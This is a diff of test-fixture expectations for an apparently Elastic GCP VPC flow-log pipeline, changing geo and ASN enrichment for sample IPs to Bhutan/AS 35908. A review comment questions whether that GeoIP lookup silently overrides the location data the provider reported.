"{\"insertId\":\"bxuq05fhgmw9j\",\"jsonPayload\":{\"bytes_sent\":\"318481\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"181\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", 
@@ -14368,11 +15061,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14444,7 +15142,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391978400Z", + "ingested": "2021-12-14T14:43:27.415248700Z", "original": "{\"insertId\":\"bxuq05fhgmw97\",\"jsonPayload\":{\"bytes_sent\":\"139359\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33874,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"70\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", 
@@ -14455,22 +15153,57 @@ } }, { + "@timestamp": "2019-06-14T03:50:16.593Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } + } + }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 60640, 
@@ -14478,6 +15211,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415249090Z", + "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:50.830164366Z", + "end": "2019-06-14T03:42:50.942543211Z", + "id": "bxuq05fhgmw9i", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14489,19 +15232,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.139.99.242", + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 1350 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -14512,38 +15266,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391982100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9i\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60640},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:50.830164366Z", - "end": "2019-06-14T03:42:50.942543211Z", - "id": "bxuq05fhgmw9i", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", - "country_name": "chn", - "city_name": "Shangqiu", - "region_name": "Henan" + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 4837 + "number": 35908 }, "address": "67.43.156.14", "port": 41818, 
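Review bot: The regenerated expectation for the 10.139.99.242:22 → 67.43.156.14 flow now pins `destination.geo` to Bhutan/BT at 27.5,90.5 and `destination.as.number` to 35908, whereas the removed lines show the previous expectation carried the location GCP itself reported in the record (chn, Shangqiu, Henan, AS 4837); the identical Bhutan/35908 result is asserted for both 67.43.156.13 and 67.43.156.14 in every other hunk, which looks like a GeoIP database lookup in the pipeline overriding the provider-supplied `dest_location`/`src_location` rather than any change in the input. If that override is intended it should be a deliberate choice: a flow record's own location and ASN are evidence an analyst may want to compare against the ingest node's lookup, and after this change they survive only inside `event.original`, i.e. only when the `preserve_original_event` tag is in effect. Consider keeping the provider values in a data-stream-specific field (for example `gcp.vpcflow.destination.location`, next to the existing `gcp.vpcflow.reporter`) or gating the geoip step so it runs only when those fields are absent, so the fixture asserts both values instead of silently replacing one with the other. The enclosing JSON document continues into the following hunk, where its `event.original` would confirm which values GCP actually reported.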
@@ -14557,6 +15293,16 @@ "domain": "elasticsearch", "ip": "10.139.99.242" }, + "event": { + "ingested": "2021-12-14T14:43:27.415249768Z", + "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:11.031370298Z", + "end": "2019-06-14T03:43:16.809366809Z", + "id": "bxuq05fhgmw9c", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -14568,22 +15314,27 @@ "iana_number": "6", "packets": 9, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:16.593Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.139.99.242", - "67.43.156.14" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 1350 + "ms": 36 } }, "source": { 
@@ -14599,28 +15350,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391986700Z", - "original": "{\"insertId\":\"bxuq05fhgmw9c\",\"jsonPayload\":{\"bytes_sent\":\"45\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41818,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:43:16.809366809Z\",\"packets_sent\":\"9\",\"reporter\":\"SRC\",\"rtt_msec\":\"1350\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:11.031370298Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:11.031370298Z", - "end": "2019-06-14T03:43:16.809366809Z", - "id": "bxuq05fhgmw9c", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 60640, 
@@ -14634,6 +15375,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415250662Z", + "original": "{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:50.830164366Z", + "end": "2019-06-14T03:42:50.942543211Z", + "id": "bxuq05fhgmw9h", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -14645,46 +15396,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:16.593Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391990500Z", - "original": "{\"insertId\":\"bxuq05fhgmw9h\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":60640,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:50.942543211Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:50.830164366Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:50.830164366Z", - "end": "2019-06-14T03:42:50.942543211Z", - "id": "bxuq05fhgmw9h", - "category": "network", - "type": "connection" } }, { 
@@ -14699,11 +15410,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14772,7 +15488,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391995300Z", + "ingested": "2021-12-14T14:43:27.415251161Z", "original": "{\"insertId\":\"bxuq05fhgmw92\",\"jsonPayload\":{\"bytes_sent\":\"358920\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33966,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"61\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", 
@@ -14794,11 +15510,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53104, @@ -14870,7 +15591,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391999800Z", + "ingested": "2021-12-14T14:43:27.415251565Z", "original": "{\"insertId\":\"bxuq05fhgmw8u\",\"jsonPayload\":{\"bytes_sent\":\"653827\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":53104},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"286\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", 
@@ -14886,11 +15607,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -14965,7 +15691,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392004Z", + "ingested": "2021-12-14T14:43:27.415251987Z", "original": "{\"insertId\":\"bxuq05fhgmw9g\",\"jsonPayload\":{\"bytes_sent\":\"5220\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33966},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"81\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510534141Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510534141Z", 
@@ -14987,11 +15713,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -15060,7 +15791,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392008100Z", + "ingested": "2021-12-14T14:43:27.415252389Z", "original": "{\"insertId\":\"bxuq05fhgmw91\",\"jsonPayload\":{\"bytes_sent\":\"31140\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33524,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.461240929Z\",\"packets_sent\":\"40\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:24.789945697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:24.789945697Z", 
@@ -15158,7 +15889,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392011400Z", + "ingested": "2021-12-14T14:43:27.415252782Z", "original": "{\"insertId\":\"bxuq05fhgmw95\",\"jsonPayload\":{\"bytes_sent\":\"1610630\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.177\",\"src_port\":60126},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"509\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", @@ -15174,11 +15905,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 53104, 
@@ -15256,7 +15992,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392015600Z", + "ingested": "2021-12-14T14:43:27.415253204Z", "original": "{\"insertId\":\"bxuq05fhgmw9a\",\"jsonPayload\":{\"bytes_sent\":\"37145\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53104,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:45.312543839Z\",\"packets_sent\":\"158\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.188944581Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.188944581Z", 
